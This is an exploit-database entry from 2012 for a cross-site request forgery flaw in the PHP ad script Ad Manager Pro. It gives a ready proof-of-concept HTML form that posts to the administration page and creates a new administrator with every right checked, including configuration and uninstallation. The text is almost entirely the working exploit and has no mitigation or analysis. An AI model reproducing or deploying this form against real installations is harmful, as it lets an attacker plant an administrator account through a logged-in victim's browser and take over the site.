Ad Manager Pro CSRF Vuln (add admin)



EKU-ID: 1629 CVE: OSVDB-ID:
Author: Jonturk75 Published: 2012-03-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Ad Manager Pro CSRF Vuln (add admin)
# Author: Jonturk75
# Vendor of Software Link: http://www.scripts.com/viewscript/php-text-ad-management/20881/
# Category:: webapps
# Demo site: http://www.scripts-demo.com/admanagerpro/administration/index.php



-------------------------------------------------------------------
<form method="post" action="admanagerpro/administration/index.php"/>
<td align="left" nowrap="">Username  </td>
<td align="left" colspan="2"><input maxlength="15" value="" name="username" size="15" class="field10"/></td>
</tr>
<tr>
<td align="left" nowrap="">Password  </td>
<td align="left" colspan="2"><input maxlength="15" name="password" size="15" class="field10"/></td>
</tr><tr>
<td align="left" nowrap="">Email  </td>
<td align="left" colspan="2"><input value="" maxlength="255" name="email" style="width: 550px;" class="field10"/></td>
</tr>
<tr>
<td align="left" nowrap="">Name  </td>

<td align="left" colspan="2"><input value="" maxlength="255" name="name" style="width: 550px;" class="field10"/>
<input type="hidden" value="admin_created" name="action"/>
<input type="hidden" value="e8fc7411553641a471251382887a8ce3" name="x"/>
<input type="hidden" value="" name="n"/><tbody><tr>
<input type="checkbox" value="advertisers" name="rights[]"/> Create/edit/delete advertisers<br/>
<input type="checkbox" value="packages" name="rights[]"/> Create/edit/delete advertising packages, prices<br/>
<input type="checkbox" value="publishers" name="rights[]"/> Create/edit/delete publishers, publishing places, payments<br/>
<input type="checkbox" value="ads" name="rights[]"/> Create/edit/delete ads<br/>
<input type="checkbox" value="def_ads" name="rights[]"/> Create/edit/delete default ads<br/>
<input type="checkbox" value="black_zones" name="rights[]"/> Blacklist, zones and keywords<br/>
<input type="checkbox" value="backup" name="rights[]"/> Backup/restore database, optimize database<br/>
<input type="checkbox" value="email_u" name="rights[]"/> Can email and send messages to users<br/>
<input type="checkbox" value="reset" name="rights[]"/> Reset statistic, run Daily Job<br/>
<input type="checkbox" value="tmpl_msg" name="rights[]"/> Templates, messages<br/>
<input type="checkbox" value="admins" name="rights[]"/> Administrators<br/>
<input type="checkbox" value="config" name="rights[]"/> Configuration, unistallation<br/>

<tr><td align="center" colspan="3"><input type="submit" class="button10" value="Submit" name="submit"/></td></tr>
</form>